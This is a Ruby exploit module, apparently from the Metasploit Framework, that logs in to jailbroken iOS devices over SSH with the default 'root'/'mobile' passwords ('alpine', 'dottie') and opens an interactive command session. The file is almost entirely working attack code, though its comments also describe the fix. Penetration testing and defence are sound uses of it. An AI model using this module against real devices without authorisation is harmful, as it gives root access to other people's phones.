GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/exploits/apple_ios/ssh/cydia_default_ssh.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'net/ssh'
require 'net/ssh/command_stream'
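# Metasploit module that checks a jailbroken Apple iOS device for the
# unchanged default SSH passwords of the 'root' and 'mobile' accounts
# (OSVDB 61284).
#
# The module only succeeds where an SSH server is reachable and one of the
# accounts listed in the target still has its default password. Setting new
# passwords for both accounts with `passwd`, or removing the SSH server when
# it is not needed, closes the issue.
class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::SSH

  # Registers the module metadata, the RHOST/RPORT options and the advanced
  # SSH_DEBUG / SSH_TIMEOUT options.
  #
  # @param info [Hash] metadata supplied by the framework, merged through update_info
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Apple iOS Default SSH Password Vulnerability',
        'Description' => %q{
          This module exploits the default credentials of Apple iOS when it
          has been jailbroken and the passwords for the 'root' and 'mobile'
          users have not been changed.
        },
        'License' => MSF_LICENSE,
        'Author' => [
          'hdm'
        ],
        'References' => [
          ['OSVDB', '61284']
        ],
        'DefaultOptions' => {
          'EXITFUNC' => 'thread'
        },
        'Payload' => {
          'Compat' => {
            'PayloadType' => 'cmd_interact',
            'ConnectionType' => 'find'
          }
        },
        'Platform' => 'unix',
        'Arch' => ARCH_CMD,
        'Targets' => [
          # Each entry of 'accounts' is a [user, password] pair tried in order by #exploit.
          ['Apple iOS', { 'accounts' => [ [ 'root', 'alpine' ], [ 'mobile', 'dottie' ]] } ],
        ],
        'Privileged' => true,
        'DisclosureDate' => '2007-07-02',
        'DefaultTarget' => 0,
        'Notes' => {
          'Stability' => [CRASH_SAFE],
          'Reliability' => [REPEATABLE_SESSION],
          # NOTE(review): every attempt is a password login that the target's
          # SSH server may record; confirm whether IOC_IN_LOGS belongs here.
          'SideEffects' => []
        }
      )
    )

    register_options(
      [
        Opt::RHOST(),
        Opt::RPORT(22)
      ], self.class
    )

    register_advanced_options(
      [
        OptBool.new('SSH_DEBUG', [ false, 'Enable SSH debugging output (Extreme verbosity!)', false]),
        OptInt.new('SSH_TIMEOUT', [ false, 'Specify the maximum time to negotiate a SSH session', 30])
      ]
    )
  end

  # @return [true] always true for this module
  def post_auth?
    true
  end

  # @return [String] the configured RHOST datastore value
  def rhost
    datastore['RHOST']
  end

  # @return [Integer] the configured RPORT datastore value
  def rport
    datastore['RPORT']
  end

  # Attempts one password login over SSH and wraps a successful session in a
  # command stream.
  #
  # Every failure path returns nil. Connection errors are reported only in
  # verbose mode; the other failures are printed with print_error.
  #
  # @param user [String] account name to log in as
  # @param pass [String] password to try for that account
  # @return [Net::SSH::CommandStream, nil] the stream on success, nil otherwise
  def do_login(user, pass)
    opts = ssh_client_defaults.merge({
      auth_methods: ['password', 'keyboard-interactive'],
      port: rport,
      password: pass
    })

    opts.merge!(verbose: :debug) if datastore['SSH_DEBUG']

    ssh = nil
    begin
      # Bound the whole negotiation, not only the TCP connect.
      ::Timeout.timeout(datastore['SSH_TIMEOUT']) do
        ssh = Net::SSH.start(rhost, user, opts)
      end
    rescue Rex::ConnectionError
      # Previously silent; surfaced in verbose mode so an unreachable host is
      # distinguishable from a rejected password.
      vprint_error "#{rhost}:#{rport} SSH - Connection failed"
      return
    rescue Net::SSH::Disconnect, ::EOFError
      print_error "#{rhost}:#{rport} SSH - Disconnected during negotiation"
      return
    rescue ::Timeout::Error
      print_error "#{rhost}:#{rport} SSH - Timed out during negotiation"
      return
    rescue Net::SSH::AuthenticationFailed
      print_error "#{rhost}:#{rport} SSH - Failed authentication"
      # Explicit return, matching the other rescue branches.
      return
    rescue Net::SSH::Exception => e
      print_error "#{rhost}:#{rport} SSH Error: #{e.class} : #{e.message}"
      return
    end

    return unless ssh

    Net::SSH::CommandStream.new(ssh)
  end

  # Tries each [user, password] pair of the selected target in order and hands
  # the socket of the first successful login to the payload handler.
  #
  # @return [void]
  def exploit
    target['accounts'].each do |user, pass|
      print_status("#{rhost}:#{rport} - Attempt to login as '#{user}' with password '#{pass}'")
      conn = do_login(user, pass)
      next unless conn

      # The closing quote after the password was missing in the original message.
      print_good("#{rhost}:#{rport} - Login Successful ('#{user}:#{pass}')")
      handler(conn.lsock)
      break
    end
  end
end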